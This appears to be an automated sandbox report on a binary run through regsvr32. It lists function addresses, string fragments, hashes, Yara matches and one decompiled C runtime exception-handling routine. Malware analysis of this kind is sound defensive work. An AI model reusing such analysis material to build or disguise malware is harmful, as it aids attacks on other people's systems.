                                                      • String ID: Client hook allocation failure at file %hs line %d.$Client hook allocation failure.$Invalid allocation size: %Iu bytes.$_CrtCheckMemory()$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c
                                                      • API String ID: 2480363372-3680694803
                                                      • Opcode ID: 5582fb477a99f139482b647e65eadd7bcea0024aa5ad3136cc4be02f6e7bf908
                                                      • Instruction ID: 8b5a52ed6c75746639c18038ef7af0115634e61e6ce836c346e70c61fc8f1b15
                                                      • Opcode Fuzzy Hash: 5582fb477a99f139482b647e65eadd7bcea0024aa5ad3136cc4be02f6e7bf908
                                                      • Instruction Fuzzy Hash: 58510931A096828AE7F48B68EC4576E73E4F395354F618135DADD83BB4EB3EE4448B01
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000000018000A758 Relevance: 9.3, Strings: 7, Instructions: 594COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: #X$ $A2>$Mum$vQ$=D$Fa
                                                      • API String ID: 0-1298193321
                                                      • Opcode ID: 982ab4627d106152f76a325de243923c319ce5c47f351cfe718817436c28ee1d
                                                      • Instruction ID: 1349cc56659c19f01a369150ff0067e3f34eaebe01bc07430d2f97da03610ed5
                                                      • Opcode Fuzzy Hash: 982ab4627d106152f76a325de243923c319ce5c47f351cfe718817436c28ee1d
                                                      • Instruction Fuzzy Hash: 24522775A0620CDFCB68DFA8D08A6DDBBF2EF58344F104119F816A7261D7B0D919CB89
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000000018001E4AC Relevance: 9.1, Strings: 7, Instructions: 371COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ._$8%Y$@4<$F+}$R1$t$xy
                                                      • API String ID: 0-3078009748
                                                      • Opcode ID: 7cd976f9c86f50bd1c1ca064b29a615496490d447d7d5288ee1f6aa5414266f6
                                                      • Instruction ID: 0e1afbee3b71ea3b5863fe80692b11929ebce18e29255cef2241f67d7a77c22f
                                                      • Opcode Fuzzy Hash: 7cd976f9c86f50bd1c1ca064b29a615496490d447d7d5288ee1f6aa5414266f6
                                                      • Instruction Fuzzy Hash: 0402E1B1504649DFCB98DF28C489ADE3BE1FB48318F41812AFC4A9B764D770DA98CB45
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D2BE50 Relevance: 9.1, APIs: 6, Instructions: 79COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      C-Code - Quality: 33%
                                                      			E000007FE7FEF9D2BE50(intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esp, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a24) {
				intOrPtr _v4;
				void* _v12;
				signed long long _v24;
				signed int _v36;
				long long _v180;
				long long _v184;
				intOrPtr _v192;
				char _v196;
				intOrPtr _v204;
				long _v212;
				long long _v220;
				long long _v228;
				long long _v1212;
				long long _v1308;
				char _v1460;
				char _v1476;
				char _v1484;
				int _v1492;
				long long _v1500;
				long long _v1508;
				long long _v1516;
				long long _v1524;
				long long _v1532;
				long long _v1540;
				void* _t51;
				signed long long _t80;
				long long _t85;
				void* _t100;

				_a24 = r8d;
				_a16 = __edx;
				_a8 = __ecx;
				_t80 =  *0xf9d4b018; // 0x6ec2365e8408
				_v24 = _t80 ^ _t100 - 0x00000610;
				if (_a8 == 0xffffffff) goto 0xf9d2be8d;
				E000007FE7FEF9D28D90(_t51, _a8);
				_v184 = 0;
				memset(__edi, 0, 0x94 << 0);
				_v1508 =  &_v196;
				_v1500 =  &_v1460;
				_v1492 = 0;
				_v212 = 0;
				__imp__RtlCaptureContext();
				_t85 = _v1212;
				_v220 = _t85;
				r8d = 0;
				0xf9d40e28();
				_v228 = _t85;
				if (_v228 == 0) goto 0xf9d2bf64;
				_v1516 = 0;
				_v1524 =  &_v1476;
				_v1532 =  &_v1484;
				_v1540 =  &_v1460;
				0xf9d40e22();
				goto 0xf9d2bf84;
				_v1212 = _v12;
				_v1308 =  &_v12;
				_v196 = _a4;
				_v192 = _a12;
				_v180 = _v12;
				_v1492 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(??);
				_v212 = UnhandledExceptionFilter(??);
				if (_v212 != 0) goto 0xf9d2bffb;
				if (_v1492 != 0) goto 0xf9d2bffb;
				if (_v4 == 0xffffffff) goto 0xf9d2bffb;
				return E000007FE7FEF9D23280(E000007FE7FEF9D28D90(_t59, _v4), _v4, __edx, _v36 ^ _t100 - 0x00000610, _v204, _v220);
			}































                                                      0x7fef9d2be50
                                                      0x7fef9d2be55
                                                      0x7fef9d2be59
                                                      0x7fef9d2be65
                                                      0x7fef9d2be6f
                                                      0x7fef9d2be7f
                                                      0x7fef9d2be88
                                                      0x7fef9d2be8d
                                                      0x7fef9d2beaa
                                                      0x7fef9d2beb4
                                                      0x7fef9d2bebe
                                                      0x7fef9d2bec3
                                                      0x7fef9d2becb
                                                      0x7fef9d2bedb
                                                      0x7fef9d2bee1
                                                      0x7fef9d2bee9
                                                      0x7fef9d2bef1
                                                      0x7fef9d2bf04
                                                      0x7fef9d2bf09
                                                      0x7fef9d2bf1a
                                                      0x7fef9d2bf1c
                                                      0x7fef9d2bf2a
                                                      0x7fef9d2bf34
                                                      0x7fef9d2bf3e
                                                      0x7fef9d2bf5d
                                                      0x7fef9d2bf62
                                                      0x7fef9d2bf6c
                                                      0x7fef9d2bf7c
                                                      0x7fef9d2bf8b
                                                      0x7fef9d2bf99
                                                      0x7fef9d2bfa8
                                                      0x7fef9d2bfb6
                                                      0x7fef9d2bfbc
                                                      0x7fef9d2bfcd
                                                      0x7fef9d2bfdc
                                                      0x7fef9d2bfe3
                                                      0x7fef9d2bfed
                                                      0x7fef9d2c013

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                      • String ID:
                                                      • API String ID: 1239891234-0
                                                      • Opcode ID: 3c99f19865488fa949415da8e2229a8dc4eaaacedc1a65a8015e4c0ea1d70d8e
                                                      • Instruction ID: ff33e713b9b9862e94e2d2fd4ae4d55f0027255630586c455cca821aadc81769
                                                      • Opcode Fuzzy Hash: 3c99f19865488fa949415da8e2229a8dc4eaaacedc1a65a8015e4c0ea1d70d8e
                                                      • Instruction Fuzzy Hash: 7041BE32909BC58AE6B08B14F8443AFB3A1F388355F50522996CD42BA8EB7ED095CF40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000000018001B3A4 Relevance: 8.2, Strings: 6, Instructions: 685COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: #X$!Iv;$=`$M@$of?$uzxY
                                                      • API String ID: 0-1910763920
                                                      • Opcode ID: 9693a8ffcd6589fd3dbfdbad085aa322119c3f1a6317bc180f44839f00dc24fe
                                                      • Instruction ID: 7899ed511868268ad7aea3719dccceda62fd29fa6bb16e154aa46d1db7c43d79
                                                      • Opcode Fuzzy Hash: 9693a8ffcd6589fd3dbfdbad085aa322119c3f1a6317bc180f44839f00dc24fe
                                                      • Instruction Fuzzy Hash: F172047190478C8BDB58DF68C88A69E7FE1FB84384F20461DF95A9B260D770D989CF81
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000000018000BC98 Relevance: 8.0, Strings: 6, Instructions: 487COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: #X$*I$;*v($;3$F9p$ef~j
                                                      • API String ID: 0-950528966
                                                      • Opcode ID: 9500c32e6f155eacac3cfe5a03c267215382f5440a46099a8d521f2441a56deb
                                                      • Instruction ID: 5057aee1002f2822c724537f3f36740fe0594223e2d956511feddf479ded4ebe
                                                      • Opcode Fuzzy Hash: 9500c32e6f155eacac3cfe5a03c267215382f5440a46099a8d521f2441a56deb
                                                      • Instruction Fuzzy Hash: 6A42E771144BCA8BCBB9CF24CC85BEF7BA0FB44306F145529D89A8A291DBB89745CF41
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000000018000F554 Relevance: 7.9, Strings: 6, Instructions: 447COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: %$9w$IX$M?@$jS<$M
                                                      • API String ID: 0-1157581923
                                                      • Opcode ID: 49f1c8efd4ee46ecb9d969e0aa9b812bfdd9bd3000ec2742c71bf52f4d967f5b
                                                      • Instruction ID: e375d1c8451a89c96fc0dfbd01d6dda6b37f4c7765b0f9ce143112ad2eac9b8a
                                                      • Opcode Fuzzy Hash: 49f1c8efd4ee46ecb9d969e0aa9b812bfdd9bd3000ec2742c71bf52f4d967f5b
                                                      • Instruction Fuzzy Hash: 8A32E4B0A147888BCBB8CF68C8897DD7BF0FB48318F90521DEA0A9B251DB745645CF59
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00000001800053B0 Relevance: 7.8, Strings: 6, Instructions: 305COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: %$&n$1U$Oh$j/$X
                                                      • API String ID: 0-3716166881
                                                      • Opcode ID: 3ec52770ba243505623e348b6c36d4d02d94aade20e82fe7112f5902b3326bac
                                                      • Instruction ID: b98437ffb223a44b0e92d10549c73aaa59fdecde54cd589da16d290276777c9c
                                                      • Opcode Fuzzy Hash: 3ec52770ba243505623e348b6c36d4d02d94aade20e82fe7112f5902b3326bac
                                                      • Instruction Fuzzy Hash: D9F13C70508B88CFD7B9CF24D48969EBBF4FB84744F204A1EE5A59B260DBB09645CF42
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0000000180028D10 Relevance: 7.7, Strings: 6, Instructions: 249COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: G8L$J9$ozq~$ss6$tiG$P;
                                                      • API String ID: 0-1765782432
                                                      • Opcode ID: c77c4daeda8c59326f72f8188263c488bfcd846ed7a7bd487d849044a826f1d5
                                                      • Instruction ID: 77e5b6b93cc6977e5a95292e040e55b4553736c218ba0195107264470a30d31c
                                                      • Opcode Fuzzy Hash: c77c4daeda8c59326f72f8188263c488bfcd846ed7a7bd487d849044a826f1d5
                                                      • Instruction Fuzzy Hash: FCC1097050064D8FDF89DF28C89A6DE3BA1FB68398F51421DFC4A962A1C778D994CBC4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D28900 Relevance: 7.6, APIs: 5, Instructions: 55timethreadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000007FEF9D2359E), ref: 000007FEF9D2893B
                                                      • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000007FEF9D2359E), ref: 000007FEF9D2894B
                                                      • GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000007FEF9D2359E), ref: 000007FEF9D28963
                                                      • GetTickCount.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000007FEF9D2359E), ref: 000007FEF9D2897B
                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000007FEF9D2359E), ref: 000007FEF9D28998
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                      • String ID:
                                                      • API String ID: 1445889803-0
                                                      • Opcode ID: 3c45f80db2f34b613ab4c9fa771cbb066be9ba5f1b7e4cdc55cd1e9c18cefb40
                                                      • Instruction ID: 08a22431f858d3c52821bee646358606f5e13fcd060269a72eebdbe744b14aa1
                                                      • Opcode Fuzzy Hash: 3c45f80db2f34b613ab4c9fa771cbb066be9ba5f1b7e4cdc55cd1e9c18cefb40
                                                      • Instruction Fuzzy Hash: 7A21E62160AF0585DAB08B19FC5032E77E0E78DBA5F241235AADD83778EF3DD2948700
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000000018001CF9C Relevance: 7.0, Strings: 5, Instructions: 751COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ,bF$-Ie:$Y$jc$_
                                                      • API String ID: 0-2562869522
                                                      • Opcode ID: 13dcfdf2b547f47b8e652e45a129a81bd12d479633329dbfd5d4c9c90b2a7465
                                                      • Instruction ID: be835d82a8a11271eaf2d0d4144821f845ce411821323c63ff6fa91e08a90877
                                                      • Opcode Fuzzy Hash: 13dcfdf2b547f47b8e652e45a129a81bd12d479633329dbfd5d4c9c90b2a7465
                                                      • Instruction Fuzzy Hash: 2F82FC7190478C8BDBBDCF24C8466DE7BE1FB88744F104A1DEA5A8A350D7B49785CB82
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00000001800270C0 Relevance: 6.9, Strings: 5, Instructions: 672COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: %$3'p$AVx.$R@\$|7}
                                                      • API String ID: 0-1377184578
                                                      • Opcode ID: 42416e948d3c9d06b93ab1f3a8ba6bb7b4031ce7609dd7b48ddc645cdcf3989a
                                                      • Instruction ID: 11bdd15b6fdebef4e4e33012fe2102d5287f0ed75640ad066b8b9400528ec4a7
                                                      • Opcode Fuzzy Hash: 42416e948d3c9d06b93ab1f3a8ba6bb7b4031ce7609dd7b48ddc645cdcf3989a
                                                      • Instruction Fuzzy Hash: F0820774604BC88BDBB8DF24DC857CD7BE0FB86305F20561DD95E9AA60CBB89645CB02
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0000000180002D28 Relevance: 6.8, Strings: 5, Instructions: 514COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: .s$/$*$89$W0$j~L
                                                      • API String ID: 0-3680180293
                                                      • Opcode ID: b1eb1fe3fa88397c885ab509abe1c858ffcdb74bf15ef161dec0971567ed18e8
                                                      • Instruction ID: f5b8073de7550f00aae71ce47ac4d0d330c984d331b26572373d31fffc6277f7
                                                      • Opcode Fuzzy Hash: b1eb1fe3fa88397c885ab509abe1c858ffcdb74bf15ef161dec0971567ed18e8
                                                      • Instruction Fuzzy Hash: 9332237050C7848FC369DF68C58A65EBBF0FB8A744F004A1EF68687260D7B6D949CB42
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000000018002A5D8 Relevance: 6.6, Strings: 5, Instructions: 339COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: :_$DHM$J? $ioF$IE
                                                      • API String ID: 0-1950181368
                                                      • Opcode ID: 259697ebe02e240ff157c8cb6796f3c563015099138ecee0effd1804923e127d
                                                      • Instruction ID: dfce06ae3f2776b2053eb0988bfb390665c026a97965fcc171ceda4eb787facd
                                                      • Opcode Fuzzy Hash: 259697ebe02e240ff157c8cb6796f3c563015099138ecee0effd1804923e127d
                                                      • Instruction Fuzzy Hash: 4E02F470A0470DEFDB99DF68C089A8EBBF1FB48344F40856AE809EB250D7749A59CB45
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000000018000E130 Relevance: 6.6, Strings: 5, Instructions: 305COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: \=V$h9&$n"$wPT$5Z3
                                                      • API String ID: 0-226182706
                                                      • Opcode ID: ce1cfba10c1d8d8dcb7fefef68f5dbb71196a1667c8063e3a43dba33cd0a9cce
                                                      • Instruction ID: 86bcb4527d36acdb60297ed143c12856cad003a08b6179b63c097fe4f6929213
                                                      • Opcode Fuzzy Hash: ce1cfba10c1d8d8dcb7fefef68f5dbb71196a1667c8063e3a43dba33cd0a9cce
                                                      • Instruction Fuzzy Hash: F7E11871A0468C8BDF59CFE8C48ABDDBBF2FB54348F004129D906BB298D774951ACB85
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0000000180013994 Relevance: 6.5, Strings: 5, Instructions: 278COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 2k$5.A$h$Tv$|
                                                      • API String ID: 0-899094025
                                                      • Opcode ID: db2f60ac8ea9c811a7e8a42be398396c7662d8ce257af2786f0ca87739e0812c
                                                      • Instruction ID: fdc8e1fcc57a9d708ca924da4610569f3fbcb91b13fa75a00635c4e08a114872
                                                      • Opcode Fuzzy Hash: db2f60ac8ea9c811a7e8a42be398396c7662d8ce257af2786f0ca87739e0812c
                                                      • Instruction Fuzzy Hash: 2CE1B2B190474C8FDB69CFA8C48969DBFF1FB48348F20421DE869AB262D7749945CF41
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000000018001A10C Relevance: 6.5, Strings: 5, Instructions: 210COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateProcess
                                                      • String ID: `H$h$T$TaK$_
                                                      • API String ID: 963392458-2145750592
                                                      • Opcode ID: ffc2d6b317b26a71c8140759e67952dd965db1d69b0c3f8b48f7c1dc501504e9
                                                      • Instruction ID: 3659a6701c3bc18b063cae63192a65d6a0dab5b7a081606fb1710f1fc1c5873b
                                                      • Opcode Fuzzy Hash: ffc2d6b317b26a71c8140759e67952dd965db1d69b0c3f8b48f7c1dc501504e9
                                                      • Instruction Fuzzy Hash: 8FA10771D087188FDB68DFA9D8856CDBBF1FB48308F20421DE45AA7252DB70A945CF41
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000000018002975C Relevance: 5.5, Strings: 4, Instructions: 484COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Bwu$L>yL${NC$^K
                                                      • API String ID: 0-3175627499
                                                      • Opcode ID: 50b0aea139128d6f7c402ec74795df524ca4165021b819f0d064fd60e31d3d12
                                                      • Instruction ID: fbf4dbbb098cc7df43bbc7889590cb4d1f5602d02220e4776b40022e4a41187c
                                                      • Opcode Fuzzy Hash: 50b0aea139128d6f7c402ec74795df524ca4165021b819f0d064fd60e31d3d12
                                                      • Instruction Fuzzy Hash: 13322B70908B488FE769CF78C48665EBBF0FB84748F204A1DE6A697270DB749945CF42
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0000000180021738 Relevance: 5.5, Strings: 4, Instructions: 483COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: %$N'}$Od^v$dS
                                                      • API String ID: 0-4183360357
                                                      • Opcode ID: 3e0f3c17ca57f4ad1f3f1084ac04447848ab7be5cba89c2bccd8803fee9248a0
                                                      • Instruction ID: 281f3f4e81126c35bb2be7146c604e5ee0be10d432db17f45780181539d507de
                                                      • Opcode Fuzzy Hash: 3e0f3c17ca57f4ad1f3f1084ac04447848ab7be5cba89c2bccd8803fee9248a0
                                                      • Instruction Fuzzy Hash: 3342D9B190438C8BDBB8CF64C8896DD7BF1FB48318F50852DDA199B251DBB05685CF98
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00000001800252C0 Relevance: 5.3, Strings: 4, Instructions: 285COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: +Gq$__Z%$|deb$sH
                                                      • API String ID: 0-2072550713
                                                      • Opcode ID: 094eb7f958d011cdb8ce81038bafb84045d4698861e966cd2ff6582630ea1e3f
                                                      • Instruction ID: 26b4cb1fb47336c1432c1659c452027cf20818b998f95a2bcb6bb32f36742f2f
                                                      • Opcode Fuzzy Hash: 094eb7f958d011cdb8ce81038bafb84045d4698861e966cd2ff6582630ea1e3f
                                                      • Instruction Fuzzy Hash: 0FD1137160270DCBDB68DF28C68A6DE3BE1FF48308F504129FC5A96262D774D929CB49
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000000018000403C Relevance: 5.3, Strings: 4, Instructions: 279COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 5P$8r$:=$xX
                                                      • API String ID: 0-2901174047
                                                      • Opcode ID: 6865726b2104b4eb7ff299f8486c8d696ddfefbd7c25c2068e726a6c762a58db
                                                      • Instruction ID: 9c4e4b6ab2cee8fe4f9bfbf45665c48137a45671121b1b9ae43ff9fbf3dba1fc
                                                      • Opcode Fuzzy Hash: 6865726b2104b4eb7ff299f8486c8d696ddfefbd7c25c2068e726a6c762a58db
                                                      • Instruction Fuzzy Hash: 35E1357191034D9BCB88DF64C8899DD7BF1FB48398F516219FC4AAB260C7789585CF88
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0000000180019178 Relevance: 5.3, Strings: 4, Instructions: 258COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: &$Ro$X|$WW
                                                      • API String ID: 0-419055892
                                                      • Opcode ID: ca40c88e9c0bb890938dc8e49850b9c6f80446ec0944c9f0783c0d192955d258
                                                      • Instruction ID: 8aa2c3e6b8818245adabd520600babaa531b4d52059a868131a34f3b668756e0
                                                      • Opcode Fuzzy Hash: ca40c88e9c0bb890938dc8e49850b9c6f80446ec0944c9f0783c0d192955d258
                                                      • Instruction Fuzzy Hash: 1EC1FDB150570DCBDB68CF28C58A6DE3BE5FB48308F108129FC5A9B2A0D774EA59CB45
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000000018001F0A8 Relevance: 5.2, Strings: 4, Instructions: 246COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: tR$tR$uxX4$6)
                                                      • API String ID: 0-566208085
                                                      • Opcode ID: c081e77f49af2eaf56923f63e50e632cb9bf55942161f3f8d2179c3bd288189e
                                                      • Instruction ID: 21dbc208fb27f88b672f000d339ef1a4b78a4386f06e48fd8b1f03ba1e8317ad
                                                      • Opcode Fuzzy Hash: c081e77f49af2eaf56923f63e50e632cb9bf55942161f3f8d2179c3bd288189e
